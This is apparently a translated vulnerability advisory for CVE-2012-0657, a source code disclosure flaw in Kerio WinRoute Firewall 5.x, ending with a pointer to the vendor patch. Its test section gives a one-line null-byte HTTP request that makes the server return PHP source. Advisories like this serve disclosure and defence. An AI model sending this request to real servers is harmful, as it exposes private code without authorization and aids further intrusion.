Release date: 2012-05-10
Updated on:
Affected Systems:
Kerio WinRoute Firewall 5.x
Unaffected system:
Kerio WinRoute firewall6.0
Description:
--------------------------------------------------------------------------------
Bugtraq id: 53460
Cve id: CVE-2012-0657
Kerio WinRoute Firewall is a popular Firewall software system.
A remote source code leakage vulnerability exists in Kerio WinRoute versions earlier than Firewall 6.0.0. Attackers can exploit this vulnerability to view the source code of files in server processes.
<* Source: Andrey Komarov
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
GET/nonauth/login.phpNULL_BYTE.txt HTTP/1.1
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Kerio
-----
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
Http://www.kerio.com/